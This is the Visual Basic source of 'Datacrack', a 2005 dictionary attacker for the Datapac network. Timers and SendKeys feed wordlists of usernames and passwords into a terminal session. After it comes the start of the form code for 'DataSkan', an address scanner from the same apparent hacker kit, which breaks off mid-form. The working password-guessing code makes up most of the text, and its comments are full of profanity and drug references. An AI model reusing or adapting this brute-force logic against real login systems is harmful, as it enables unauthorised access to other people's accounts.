Private Sub cmdhelp_Click()
    frmAbout.Show
End Sub

Private Sub cmdstart_Click()
    'ok. this is where everything starts.
    Close
    lsd = False
    strippers = False
    american_dream = False
    fuck_nixon = 1
    generation = 0
    lono = 0
    mescaline = 0
    white_rabbit = 1
    politics = 0
    fear_and_loathing = 0
    Shape1.FillColor = vbYellow
    cmdstop.Default = True
    cmdstart.Enabled = False
    If txtusernamecycles.Text <> 0 Or txtusernamecycles.Text <> "" Then
        strippers = True
        sheriff = txtusernamecycles.Text
    End If
    If txtpasscycle.Text <> 0 Or txtpasscycle.Text <> "" Then
        american_dream = True
        politics = txtpasscycle.Text
    End If
    lbltimerunning.Caption = Date & " " & Time
    Dim nixon As String 'nixon is a dummy variable. nixon is also a dummy.
    'we analyze the very last entery in the usernames. if the very last usrname is not jsmith
    'then we add it. we do this because there is an off by one error some where in here, and
    'god damn it, i cant find it. So im going to take the easy way out and make sure every
    'username that the attacker wants to be used is in there, + one bogus one.
    Open txtusernames.Text For Input As #1
    DoEvents
    Do Until EOF(1)
        Line Input #1, nixon
        DoEvents
    Loop
    Close #1
    If nixon <> "jsmith" Then
        Open txtusernames.Text For Append As #1
        DoEvents
        Print #1, vbCrLf
        Print #1, "jsmith"
        DoEvents
        Close #1
        DoEvents
    End If
    'ok here we calculate how far we do this shit
    Open txtusernames.Text For Input As #1
    DoEvents
    Do Until EOF(1)
        Line Input #1, nixon
        lono = lono + 1
        DoEvents
    Loop
    Close #1
    DoEvents
    Open txtpasswords.Text For Input As #1
    DoEvents
    Do Until EOF(1)
        Line Input #1, nixon
        generation = generation + 1
        DoEvents
    Loop
    Close #1
    Dim mojo_machine As Integer
    mojo_machine = generation * (lono - 1)
    DoEvents
    lbltotalcycle.Caption = mojo_machine
    DoEvents
    'setting timer1s interval
    Timer1.Interval = txtwaitsendkeys.Text
    'opening the username and passwords
    Open txtusernames.Text For Input As #1
    DoEvents
    Open txtpasswords.Text For Input As #2
    DoEvents
    Timer1.Enabled = True
End Sub

Private Sub cmdstop_Click()
    cmdstart.Enabled = True
    lsd = True
    Shape1.FillColor = vbRed
End Sub

Private Sub Timer1_Timer()
    'this is the preliminary timer. here we do things like send the datapac address
    'and initate the datapac connection with a period and set the second timers interval.
    '
    'this timer is mainly to give the user some seconds to switch over to the terminal client
    'lsd is to check if the user stoped the attack. lsd is also for getting high on.
    If lsd = True Then
        Timer1.Enabled = False
        Timer2.Enabled = False
        Timer3.Enabled = False
        Timer4.Enabled = False
        Exit Sub
    End If
    Shape1.FillColor = vbGreen
    If chkperiod.Value = True Then SendKeys (".")
    Timer2.Interval = txtwaitusername.Text
    Timer1.Enabled = False
    Timer2.Enabled = True
    'hst is the username we will send.
    Line Input #1, hst
    DoEvents
    SendKeys (txtaddress.Text)
    SendKeys (vbCr)
    DoEvents
    'ok. we need to check here if we send shit after we send the address.
    If txtaddress1.Text <> "" Then
        Timer6.Interval = txtwaitusername.Text
        Timer6.Enabled = True
        Timer2.Enabled = False
    End If
End Sub

Private Sub Timer2_Timer()
    'this is the function where we send the username
    'lsd is to check if the user stoped the attack. lsd is also for getting high on.
    If lsd = True Then
        Timer1.Enabled = False
        Timer2.Enabled = False
        Timer3.Enabled = False
        Timer4.Enabled = False
        Exit Sub
    End If
    DoEvents
    If chkusername.Value = Checked Then
        SendKeys (hst)
    End If
    'SendKeys (vbCr)
    DoEvents
    'update % complete
    lblpercentcomplete.Caption = Int(lblcurrentcycle.Caption / lbltotalcycle.Caption * 100) & "%"
    If strippers = True Then
        'if there is extra data to send then..
        'first we check to see if it is our time to go
        'white rabbit by jefferson airplane. l33t s0ng3zwh0rz
        white_rabbit = white_rabbit + 1
        'this is for debugging and seeing what exactly is going on in the code
        ' SendKeys (" white rabbit: " & white_rabbit)
        ' SendKeys (vbCr)
        ' SendKeys ("sheriff: " & sheriff)
        ' SendKeys (vbCr)
        DoEvents
        ' MsgBox "white rabbit: " & white_rabbit & " txtcycle: " & txtusernamecycles.Text
        If txtusernamecycles.Text <= white_rabbit Then
            'MsgBox "inside of the whore!"
            white_rabbit = 0
            Timer4.Interval = txtwaitusername.Text
            Timer4.Enabled = True
            Timer2.Enabled = False
            Exit Sub
        End If
    End If
    Timer2.Enabled = False
    Timer3.Interval = txtwaitusername.Text
    Timer3.Enabled = True
    DoEvents
    If EOF(1) = True Then
        'if its the end of the usernames then we are fucking done!
        Close #1
        Timer1.Enabled = False
        Timer2.Enabled = False
        Timer3.Enabled = False
        Timer4.Enabled = False
        Shape1.FillColor = vbYellow
    End If
End Sub

Private Sub Timer3_Timer()
    'this is the function where we send the password
    lblcurrentcycle.Caption = lblcurrentcycle.Caption + 1
    'lsd is to check if the user stoped the attack. lsd is also for getting high on.
    If lsd = True Then
        MsgBox "USER STOPPED ATTACK!"
        Timer1.Enabled = False
        Timer2.Enabled = False
        Timer3.Enabled = False
        Timer4.Enabled = False
        Exit Sub
    End If
    'gonzo is the password we will send. Gonzo is also the type of journalism that hst
    'invented gonzo is writen on the fly, often tape recorded then sent to print without
    'editing or censorship. The results are often shocking and brutaly honest.
    Line Input #2, gonzo
    DoEvents
    If EOF(2) = True Then
        Close #2
        DoEvents
        Open txtpasswords.Text For Input As #2
        DoEvents
        If EOF(1) = False Then Line Input #1, hst
    End If
    SendKeys (gonzo)
    SendKeys (vbCr)
    'ooooookah. its 2 am and im getting tired already. i must be getting old. anyways..
    'this part is for if you need to send extra data to the target AFTER the username
    'and password how about some unnessesary freestyle rap in the comments of this code?
    'yo im MC code, and i rode in on a battle ship node to e-quip the hommies of datapac.
    'its one fifty subseven eleven am and im about to get a snack to keep me typin.
    'Listening to some crazy trance has got me hypin. the buildup about to explode, fuck
    'fuck fucking code off by one fence post error, i swear, if that happens again like
    'shit. fucking dandy. it took all day to get that shit correct. if some one says this
    'shit is easy they are going to get decked by my phree style hip hop wizardry like
    'potter harrey knows. thats the way the shit goes. hoes on adrenochrome want my t00lz.
    'dead cow rulez. eat it for breakfast, brunch and lunch. i got a hunch but not like back,
    'more like a camel, lord's on track while chrak is on teh rock like crack. fuck talk, we
    'want war on the whitehat. fuck a packet, i'll get my bat, like luisville. im up till dawn,
    'but i dont drink coffie. the rush of the command prompt got me high like the dope of a
    'poppy. i am not afraid to use public variables. its only sloppy to the noobies who fear
    'the unstructured source. i endorse THC the hackers choice like doobies and bongs. two
    'wrongs make a left. i hit that shit till there aint none left. bust out the bong until
    'the sun hits the lawn then thats when i pass out. my kung fu is strong. props to thompson
    'hunter s g. RIP. for skeezy. he was down with all of us. he was a hommie.
    mescaline = mescaline + 1
    If mescaline = txtpasscycle.Text Then
        Timer5.Interval = txtwaitpassword.Text
        DoEvents
        mescaline = 0
        Timer1.Enabled = False
        Timer2.Enabled = False
        Timer3.Enabled = False
        Timer4.Enabled = False
        Timer5.Enabled = True
        Exit Sub
    End If
    Timer3.Enabled = False
    Timer2.Enabled = True
    DoEvents
    '!@#$
    'we check to see if we need to send the address again
    If chkaddress.Value = Checked Then
        fear_and_loathing = fear_and_loathing + 1
        If fear_and_loathing = txtsendaddress.Text Then
            SendKeys (txtaddress.Text)
            SendKeys (vbCr)
            fear_and_loathing = 0
            If txtaddress1.Text <> "" Then
                'disabling timer 2, but we will enable it after
                'we send the shit we need
                Timer6.Interval = txtwaitpassword.Text
                Timer6.Enabled = True
                Timer2.Enabled = False
            End If
        End If
    End If
    'update % complete
    lblpercentcomplete.Caption = Int(lblcurrentcycle.Caption / lbltotalcycle.Caption * 100) & "%"
End Sub

Private Sub Timer4_Timer()
    'here we send any extra data after the username gets sent
    Dim army_newspaper As String
    army_newspaper = txtusernamesend1.Text
    If txtusernamecycles.Text <> "0" Or txtusernamecycles.Text <> "" Then
        If txtusernamereturn.Enabled = True And chkusername.Value = Checked Then
            SendKeys (vbCr)
        End If
        SendKeys (army_newspaper)
    End If
    DoEvents
    'time for a 15 minute interbitchin. time for some poopcorn and sodapoop
    '
    'If txtusernamecycles.Text = "0" Or txtusernamecycles.Text = "" Then
    ' Timer1.Enabled = False
    ' Timer2.Enabled = False
    ' Timer3.Enabled = True
    ' Timer4.Enabled = False
    ' Timer5.Enabled = False
    ' Exit Sub
    'End If
    'now we send extra cartrage returns if needed
    If txtusernamereturn.Text <> "0" Or txtusernamereturn.Text <> "" Then
        Dim opium, hippies As Integer
        opium = txtusernamereturn.Text
        If chkusername.Value = Checked Then
            For hippies = 0 To opium
                SendKeys (vbCr)
                DoEvents
            Next hippies
        End If
    End If
    'update % complete
    lblpercentcomplete.Caption = Int(lblcurrentcycle.Caption / lbltotalcycle.Caption * 100) & "%"
    'now we return to our regularily scheduled programming
    Timer3.Interval = txtwaitusername.Text
    Timer3.Enabled = True
    Timer4.Enabled = False
    'rem this out if it shows fuqsonz in the next run
    If EOF(1) = True Then
        'if its the end of the usernames then we are fucking done!
        Close #1
        Timer1.Enabled = False
        Timer2.Enabled = False
        Timer3.Enabled = False
        Timer4.Enabled = False
        Shape1.FillColor = vbYellow
    End If
End Sub

Private Sub Timer5_Timer()
    'this is for the extra data to send after the password is sent
    'for example, you might have to send "login" or "logon"
    'or "user" and then "login"
    'or select from a menu
    'like a sample log file might look like this:
    ' DATAPAC COMPUTERZ()R!
    'select from list:
    '
    '1) accounting
    '2) security
    '3) porn folder
    '4) networking
    '
    '>2
    '
    ' You choose security! Please enter your login name
    'USERNAME:XXXXX
    'PASSWORD:XXXXX
    'SORRY USERLOGIN FUCKING WRONG!
    '
    'select from list:
    '
    '1) accounting
    '2) security
    '3) porn folder
    'etc etc
    '....as you can see for this one, once you have a wrong username and password
    'you have to enter from the list again before you can attempt to login.
    'MsgBox "HELLO!"
    If txtpasssend1.Text <> "" Or txtpasscycle.Text <> "0" Then
        If txtpassreturn.Enabled = True Then
            SendKeys (txtpasssend1.Text)
            SendKeys (vbCr)
            DoEvents
        End If
    End If
    'sending extra return keys (if needed)
    If txtpassreturn.Text <> "" And txtpassreturn.Text <> "0" Then
        Dim okanfold, clinton As Integer
        okanfold = txtpassreturn.Text
        For clinton = 1 To okanfold
            SendKeys (vbCr)
            DoEvents
        Next clinton
        DoEvents
    End If
    Timer5.Enabled = False
    Timer4.Enabled = False
    Timer3.Enabled = False
    Timer2.Enabled = True
    DoEvents
    'wewt! it's only 2:30am and im already having visual halucinations from sleep deprivation!
    'i thought i saw my cat walk into the room, but she didnt walk into the room.
    'i've probiby been having autidutory halucinations as well, but this awesome hard hard
    'house i've been listening to is masking dat shit
    '
    'sleep deprivation rules!
    '
    'its also making me mad. fucking stupid timers! why cant vb just have a sleep() funciton
    'like in qbasic
    'fuckfuckfuck i am angry.
    'fuck
    Exit Sub
End Sub

Private Sub Timer6_Timer()
    'alrighty. this is the first part of what we need to send after we send an address.
    ' after we do whatever is needed to be done in this function, we need to re-enable
    'timer2.
    SendKeys (txtaddress1.Text)
    DoEvents
    SendKeys (vbCr)
    If txtaddressreturn.Enabled = True Then
        Dim shotgun, target_practice As Integer
        shotgun = txtaddressreturn.Text
        For target_practice = 1 To shotgun
            SendKeys (crlf)
            DoEvents
        Next target_practice
        DoEvents
    End If
    Timer6.Enabled = False
    Timer2.Enabled = True
End Sub

Private Sub txtaddress1_Change()
    If txtaddress1.Text <> "" Then
        txtaddressreturn.Enabled = True
    Else
        txtaddressreturn.Enabled = False
    End If
End Sub

Private Sub txtpasssend1_Change()
    If txtpasssend1.Text <> "" Then
        txtpassreturn.Enabled = True
        txtpasscycle.Enabled = True
    Else
        txtpassreturn.Enabled = False
        txtpasscycle.Enabled = False
    End If
End Sub

Private Sub txtusernamesend1_Change()
    If txtusernamesend1.Text <> "" Then
        txtusernamecycles.Enabled = True
        txtusernamereturn.Enabled = True
    End If
    If txtusernamesend1.Text = "" Then
        txtusernamecycles.Enabled = False
        txtusernamereturn.Enabled = False
    End If
End Sub

- frmAbout.FRM:

VERSION 5.00
Begin VB.Form frmAbout
   BorderStyle = 3 'Fixed Dialog
   Caption = "About MyApp"
   ClientHeight = 2865
   ClientLeft = 2340
   ClientTop = 1935
   ClientWidth = 5730
   ClipControls = 0 'False
   Icon = "frmAbout.frx":0000
   LinkTopic = "Form2"
   MaxButton = 0 'False
   MinButton = 0 'False
   ScaleHeight = 1977.474
   ScaleMode = 0 'User
   ScaleWidth = 5380.766
   ShowInTaskbar = 0 'False
   Begin VB.PictureBox picIcon
      AutoSize = -1 'True
      ClipControls = 0 'False
      Height = 540
      Left = 240
      Picture = "frmAbout.frx":0152
      ScaleHeight = 337.12
      ScaleMode = 0 'User
      ScaleWidth = 337.12
      TabIndex = 1
      Top = 240
      Width = 540
   End
   Begin VB.CommandButton cmdOK
      Cancel = -1 'True
      Caption = "OK"
      Default = -1 'True
      Height = 465
      Left = 4320
      TabIndex = 0
      Top = 2040
      Width = 1380
   End
   Begin VB.Label lblDescription
      Caption = $"frmAbout.frx":02A4
      ForeColor = &H00000000&
      Height = 690
      Left = 90
      TabIndex = 2
      Top = 1080
      Width = 5205
   End
   Begin VB.Label lblTitle
      Caption = "DataCrack"
      ForeColor = &H00000000&
      Height = 480
      Left = 1050
      TabIndex = 4
      Top = 240
      Width = 3885
   End
   Begin VB.Label lblVersion
      Caption = "Version"
      Height = 225
      Left = 1050
      TabIndex = 5
      Top = 780
      Width = 3885
   End
   Begin VB.Label lblDisclaimer
      Caption = $"frmAbout.frx":0360
      ForeColor = &H00000000&
      Height = 1065
      Left = 135
      TabIndex = 3
      Top = 1800
      Width = 3990
   End
End
Attribute VB_Name = "frmAbout"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Option Explicit

' Reg Key Security Options...
Const READ_CONTROL = &H20000
Const KEY_QUERY_VALUE = &H1
Const KEY_SET_VALUE = &H2
Const KEY_CREATE_SUB_KEY = &H4
Const KEY_ENUMERATE_SUB_KEYS = &H8
Const KEY_NOTIFY = &H10
Const KEY_CREATE_LINK = &H20
Const KEY_ALL_ACCESS = KEY_QUERY_VALUE + KEY_SET_VALUE + _
                       KEY_CREATE_SUB_KEY + KEY_ENUMERATE_SUB_KEYS + _
                       KEY_NOTIFY + KEY_CREATE_LINK + READ_CONTROL

' Reg Key ROOT Types...
Const HKEY_LOCAL_MACHINE = &H80000002
Const ERROR_SUCCESS = 0
Const REG_SZ = 1 ' Unicode nul terminated string
Const REG_DWORD = 4 ' 32-bit number

Const gREGKEYSYSINFOLOC = "SOFTWARE\Microsoft\Shared Tools Location"
Const gREGVALSYSINFOLOC = "MSINFO"
Const gREGKEYSYSINFO = "SOFTWARE\Microsoft\Shared Tools\MSINFO"
Const gREGVALSYSINFO = "PATH"

Private Declare Function RegOpenKeyEx Lib "advapi32" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, ByRef phkResult As Long) As Long
Private Declare Function RegQueryValueEx Lib "advapi32" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, ByRef lpType As Long, ByVal lpData As String, ByRef lpcbData As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32" (ByVal hKey As Long) As Long

Private Sub cmdSysInfo_Click()
    Call StartSysInfo
End Sub

Private Sub cmdOK_Click()
    Unload Me
End Sub

Private Sub Form_Load()
    Me.Caption = "About " & App.Title
    lblVersion.Caption = "Version " & App.Major & "." & App.Minor & "." & App.Revision
    lblTitle.Caption = App.Title
End Sub

Public Sub StartSysInfo()
    On Error GoTo SysInfoErr

    Dim rc As Long
    Dim SysInfoPath As String

    ' Try To Get System Info Program Path\Name From Registry...
    If GetKeyValue(HKEY_LOCAL_MACHINE, gREGKEYSYSINFO, gREGVALSYSINFO, SysInfoPath) Then
    ' Try To Get System Info Program Path Only From Registry...
    ElseIf GetKeyValue(HKEY_LOCAL_MACHINE, gREGKEYSYSINFOLOC, gREGVALSYSINFOLOC, SysInfoPath) Then
        ' Validate Existance Of Known 32 Bit File Version
        If (Dir(SysInfoPath & "\MSINFO32.EXE") <> "") Then
            SysInfoPath = SysInfoPath & "\MSINFO32.EXE"
        ' Error - File Can Not Be Found...
        Else
            GoTo SysInfoErr
        End If
    ' Error - Registry Entry Can Not Be Found...
    Else
        GoTo SysInfoErr
    End If

    Call Shell(SysInfoPath, vbNormalFocus)

    Exit Sub
SysInfoErr:
    MsgBox "System Information Is Unavailable At This Time", vbOKOnly
End Sub

Public Function GetKeyValue(KeyRoot As Long, KeyName As String, SubKeyRef As String, ByRef KeyVal As String) As Boolean
    Dim i As Long ' Loop Counter
    Dim rc As Long ' Return Code
    Dim hKey As Long ' Handle To An Open Registry Key
    Dim hDepth As Long '
    Dim KeyValType As Long ' Data Type Of A Registry Key
    Dim tmpVal As String ' Tempory Storage For A Registry Key Value
    Dim KeyValSize As Long ' Size Of Registry Key Variable
    '------------------------------------------------------------
    ' Open RegKey Under KeyRoot {HKEY_LOCAL_MACHINE...}
    '------------------------------------------------------------
    rc = RegOpenKeyEx(KeyRoot, KeyName, 0, KEY_ALL_ACCESS, hKey) ' Open Registry Key

    If (rc <> ERROR_SUCCESS) Then GoTo GetKeyError ' Handle Error...

    tmpVal = String$(1024, 0) ' Allocate Variable Space
    KeyValSize = 1024 ' Mark Variable Size

    '------------------------------------------------------------
    ' Retrieve Registry Key Value...
    '------------------------------------------------------------
    rc = RegQueryValueEx(hKey, SubKeyRef, 0, _
                         KeyValType, tmpVal, KeyValSize) ' Get/Create Key Value

    If (rc <> ERROR_SUCCESS) Then GoTo GetKeyError ' Handle Errors

    If (Asc(Mid(tmpVal, KeyValSize, 1)) = 0) Then ' Win95 Adds Null Terminated String...
        tmpVal = Left(tmpVal, KeyValSize - 1) ' Null Found, Extract From String
    Else ' WinNT Does NOT Null Terminate String...
        tmpVal = Left(tmpVal, KeyValSize) ' Null Not Found, Extract String Only
    End If
    '------------------------------------------------------------
    ' Determine Key Value Type For Conversion...
    '------------------------------------------------------------
    Select Case KeyValType ' Search Data Types...
    Case REG_SZ ' String Registry Key Data Type
        KeyVal = tmpVal ' Copy String Value
    Case REG_DWORD ' Double Word Registry Key Data Type
        For i = Len(tmpVal) To 1 Step -1 ' Convert Each Bit
            KeyVal = KeyVal + Hex(Asc(Mid(tmpVal, i, 1))) ' Build Value Char. By Char.
        Next
        KeyVal = Format$("&h" + KeyVal) ' Convert Double Word To String
    End Select

    GetKeyValue = True ' Return Success
    rc = RegCloseKey(hKey) ' Close Registry Key
    Exit Function ' Exit

GetKeyError: ' Cleanup After An Error Has Occured...
    KeyVal = "" ' Set Return Val To Empty String
    GetKeyValue = False ' Return Failure
    rc = RegCloseKey(hKey) ' Close Registry Key
End Function

- Project1.VBP:

Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\WINDOWS\System32\stdole2.tlb#OLE Automation
Object={F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0; COMDLG32.OCX
Form=Form1.frm
Form=frmAbout.frm
IconForm="Form1"
Startup="Form1"
HelpFile=""
Title="Datacrack"
ExeName32="datacrack.exe"
Path32="..\Binary"
Command32=""
Name="Datacrack"
HelpContextID="0"
Description="datapac dictionary attacker"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="Aftermath"
VersionFileDescription="Datapac Dictionary Attacker"
VersionLegalCopyright="Copyleft Feburary 2005"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1

[MS Transaction Server]
AutoRefresh=1

- Project1.VBW:

Form1 = 96, 129, 543, 511, I, 0, 0, 0, 0, C
frmAbout = 0, 0, 0, 0, C, 0, 0, 0, 0, C

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

Datapac Hacker's Kit: DataSkan Source Code
by: Aftermath

Download it at: http://www.hackcanada.com/canadian/hacking/datapac_hackers_kit.rar

According to Hack Canada:
"Includes the Datascan NUA scanner and the Datacrack username/password dictionary attacker for windows. VB source code included."
(Notes: Form1.FRX, Form2.FRX, Form3.FRX, and frmAbout.FRX excluded due to mangled code)

- Form1.FRM:

VERSION 5.00
Object = "{F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0"; "COMDLG32.OCX"
Begin VB.Form Form1
   BorderStyle = 1 'Fixed Single
   Caption = "DataSkan"
   ClientHeight = 6285
   ClientLeft = 1005
   ClientTop = 1575
   ClientWidth = 5775
   Icon = "Form1.frx":0000
   LinkTopic = "Form1"
   MaxButton = 0 'False
   MinButton = 0 'False
   ScaleHeight = 6285
   ScaleWidth = 5775
   Begin MSComDlg.CommonDialog CommonDialog1
      Left = 4080
      Top = 0
      _ExtentX = 847
      _ExtentY = 847
      _Version = 393216
   End
   Begin VB.Timer Timer3
      Left = 3600
      Top = 0
   End
   Begin VB.Frame Frame4
      Caption = "Lists"
      Height = 615
      Left = 0
      TabIndex = 31
      ToolTipText = "You can use a list rather than scan a range"
      Top = 2640
      Width = 5775
      Begin VB.CommandButton cmdcommon1
         Caption = "..."
         Enabled = 0 'False
         Height = 255
         Left = 5400
         TabIndex = 38
         Top = 240
         Width = 255
      End
      Begin VB.TextBox txtlist
         Enabled = 0 'False
         Height = 285
         Left = 2280
         TabIndex = 33
         Text = "C:\Documents and Settings\Administrator\list.TXT"
         ToolTipText = "location of list file"
         Top = 240
         Width = 3015
      End
      Begin VB.CheckBox chklist
         Caption = "Use List"
         Height = 255
         Left = 120
         TabIndex = 32
         ToolTipText = "check this box if you wish to use a list instead of scan a range"
         Top = 240
         Width = 975
      End
      Begin VB.Label Label17
         Caption = "location of list:"
         Enabled = 0 'False
         Height = 255
         Left = 1200
         TabIndex = 34
         Top = 240
         Width = 1095
      End
   End
   Begin VB.CheckBox chkperiod
      Caption = "Send Period (.)"
      Height = 255
      Left = 0
      TabIndex = 21
      ToolTipText = "a period initiates a datapac session."
      Top = 2280
      Value = 1 'Checked
      Width = 1575
   End
   Begin VB.Timer Timer2
      Left = 3120
      Top = 0
   End
   Begin VB.TextBox txtconnectwait
      Height = 285
      Left = 2160
      TabIndex = 15
      Text = "240"
      ToolTipText = "This is the time in miliseconds data will be sent to the terminal client. The lower the number the faster the scan."
      Top = 2280
      Width = 375
   End
   Begin VB.Timer Timer1
      Left = 2640
      Top = 0
   End
   Begin VB.CommandButton cmdstop
      Caption = "Stop"
      Default = -1 'True
      Height = 495
      Left = 0
      TabIndex = 14
      ToolTipText = "stop scanning"
      Top = 1080
      Width = 1575
   End
   Begin VB.CommandButton cmdstart
      Caption = "Start"
      Height = 495
      Left = 0
      TabIndex = 13
      ToolTipText = "start skannin"
      Top = 1680
      Width = 1575
   End
   Begin VB.TextBox txtseconds
      Height = 285
      Left = 2160
      TabIndex = 10
      Text = "3"
      ToolTipText = "this is the amount of seconds you will give yourself to switch over to the terminal client before keys are sent to the window"
      Top = 1920
      Width = 375
   End
   Begin VB.TextBox txtreturn
      Height = 285
      Left = 2160
      TabIndex = 7
      Text = "1"
      ToolTipText = "the amount of times to send a cartrage return (enter) to datapac after every time you attempt to connect to an address."
      Top = 1560
      Width = 375
   End
   Begin VB.Frame Frame1
      Caption = "Scan.."
      Height = 975
      Left = 0
      TabIndex = 0
      ToolTipText = "This is where you set the range of addresses to scan"
      Top = 0
      Width = 1935
      Begin VB.TextBox txtto
         Height = 285
         Left = 960
         TabIndex = 37
         Text = "9999"
         ToolTipText = "to"
         Top = 600
         Width = 855
      End
      Begin VB.TextBox txtfrom
         Height = 285
         Left = 120
         TabIndex = 36
         Text = "0000"
         ToolTipText = "from"
         Top = 600
         Width = 735
      End
      Begin VB.TextBox txtrange
         Height = 285
         Left = 960
         TabIndex = 35
         Text = "(4 digets)"
         ToolTipText = "First four numbers of every address that will be scanned."
         Top = 240
         Width = 855
      End
      Begin VB.Label Label1
         Caption = "Range:"
         Height = 255
         Left = 120
         TabIndex = 1
         Top = 240
         Width = 495
      End
   End
   Begin VB.Frame Frame2
      Caption = "Time:"
      Height = 1455
      Left = 2040
      TabIndex = 2
      ToolTipText = "Time to start and end"
      Top = 0
      Width = 3735
      Begin VB.CheckBox chkstop
         Caption = "Dont stop"
         Height = 375
         Left = 2520
         TabIndex = 30
         ToolTipText = "check this box if you wish to not stop and continue scanning until range is complete or list is done"
         Top = 960
         Width = 1095
      End
      Begin VB.CheckBox chkfrom
         Caption = "From Now"
         Height = 255
         Left = 2520
         TabIndex = 29
         ToolTipText = "Check this box if you wish to start scanning right away"
         Top = 480
         Value = 1 'Checked
         Width = 1095
      End
      Begin VB.TextBox txtfromampm
         Enabled = 0 'False
         Height = 285
         Left = 1920
         TabIndex = 28
         Text = "AM"
         ToolTipText = "start in the AM or the PM"
         Top = 480
         Width = 375
      End
      Begin VB.TextBox txtfromseconds
         Enabled = 0 'False
         Height = 285
         Left = 1320
         TabIndex = 27
         Text = "00"
         ToolTipText = "start seconds"
         Top = 480
         Width = 375
      End
      Begin VB.TextBox txtfromminutes
         Enabled = 0 'False
         Height = 315
         Left = 720
         TabIndex = 25
         Text = "00"
         ToolTipText = "start minutes"
         Top = 480
         Width = 375
      End
      Begin VB.TextBox txtfromhours
         Enabled = 0 'False
         Height = 285
         Left = 120
         TabIndex = 23
         Text = "12"
         ToolTipText = "start hours"
         Top = 480
         Width = 375
      End
      Begin VB.TextBox txtampm
         Height = 285
         Left = 1920
         TabIndex = 20
         Text = "AM"
         ToolTipText = "am/pm"
         Top = 1080
         Width = 375
      End
      Begin VB.TextBox txtsecond
         Height = 285
         Left = 1320
         TabIndex = 6
         Text = "00"
         ToolTipText = "seconds"
         Top = 1080
         Width = 375
      End
      Begin VB.TextBox txtminute
         Height = 285
         Left = 720
         TabIndex = 5
         Text = "06"
         ToolTipText = "minutes"
         Top = 1080
         Width = 375
      End
      Begin VB.TextBox txthour
         Height = 285
         Left = 120
         TabIndex = 4
         Text = "06"
         ToolTipText = "hours"
         Top = 1080
         Width = 375
      End
      Begin VB.Label Label16
         Caption = ":"
         Height = 255
         Left = 1200
         TabIndex = 26
         Top = 480
         Width = 135
      End
      Begin VB.Label Label15
         Caption = ":"
         Height = 255
         Left = 600
         TabIndex = 24
         Top = 480
         Width = 135
      End
      Begin VB.Label Label14
         Caption = "from"
         Height = 255
         Left = 120
         TabIndex = 22
         Top = 240
         Width = 615
      End
      Begin VB.Label Label12
         Caption = ":"
         Height = 255
         Left = 1200
         TabIndex = 19
         Top = 1080
         Width = 135
      End
      Begin VB.Label Label11
         Caption = ":"
         Height = 255
         Left = 600
         TabIndex = 18
         Top = 1080
         Width = 135
      End
      Begin VB.Label Label3
         Caption = "until:"
         Height = 255
         Left = 120
         TabIndex = 3
         Top = 840
         Width = 975
      End
   End
   Begin VB.Frame Frame5
      Caption = "Extra Data to send:"
      Height = 3015
      Left = 0
      TabIndex = 39
      ToolTipText = "This sends commands to the modem using the AT commands. Shift+Enter for new line."
      Top = 3240
      Width = 5775
      Begin VB.Frame Frame6
         Caption = "Data to send after Completion"
         Enabled = 0 'False
         Height = 1335
         Left = 120
         TabIndex = 43
         ToolTipText = "This gets sent to the modem after the range or list is complete."
         Top = 1560
         Width = 5535
         Begin VB.TextBox txtcompletion
            Enabled = 0 'False
            Height = 975
            Left = 120
            MultiLine = -1 'True
            ScrollBars = 2 'Vertical
            TabIndex = 44
            Text = "Form1.frx":0442
            ToolTipText = "type modem commands here"
            Top = 240
            Width = 5295
         End
      End
      Begin VB.CheckBox chkextra
         Height = 255
         Left = 1560
         TabIndex = 42
         ToolTipText = "Check this box if you want to send commands to the modem before and/or after completion of a scan"
         Top = 0
         Width = 375
      End
      Begin VB.TextBox txtextra
         Enabled = 0 'False
         Height = 1005
         Left = 240
         MultiLine = -1 'True
         ScrollBars = 2 'Vertical
         TabIndex = 40
         ToolTipText = $"Form1.frx":0464
         Top = 480
         Width = 5295
      End
      Begin VB.Frame Frame3
         Caption = "Data to send initialy"
         Enabled = 0 'False
         Height = 1335
         Left = 120
         TabIndex = 41
         ToolTipText = "This gets sent right away (even before the period.)"
         Top = 240
         Width = 5535
      End
   End
   Begin VB.PictureBox Picture1
      BorderStyle = 0 'None
      Height = 495
      Left = 1680
      ScaleHeight = 495
      ScaleWidth = 375
      TabIndex = 45
      ToolTipText = "click here if you want to learn more about datapac"
      Top = 1080
      Width = 375
   End
   Begin VB.Label Label9
      Caption =
"milisecond(s) between address connect attempts" BeginProperty Font Name = "MS Serif" Size = 8.25 Charset = 0 Weight = 400 Underline = 0 'False Italic = 0 'False Strikethrough = 0 'False EndProperty Height = 255 Left = 2640 TabIndex = 17 Top = 2280 Width = 3255 End Begin VB.Label Label8 Caption = "Wait" Height = 255 Left = 1680 TabIndex = 16 Top = 2280 Width = 375 End Begin VB.Label Label7 Caption = "Second(s) before send keys begins" BeginProperty Font Name = "MS Serif" Size = 8.25 Charset = 0 Weight = 400 Underline = 0 'False Italic = 0 'False Strikethrough = 0 'False EndProperty Height = 255 Left = 2640 TabIndex = 12 Top = 1920 Width = 3135 End Begin VB.Label Label6 Caption = "Wait" Height = 255 Left = 1680 TabIndex = 11 Top = 1920 Width = 375 End Begin VB.Label Label5 Caption = "cartrage returns after every address scanned" BeginProperty Font Name = "MS Serif" Size = 8.25 Charset = 0 Weight = 400 Underline = 0 'False Italic = 0 'False Strikethrough = 0 'False EndProperty Height = 255 Left = 2640 TabIndex = 9 Top = 1560 Width = 3375 End Begin VB.Label Label4 Caption = "Send" Height = 255 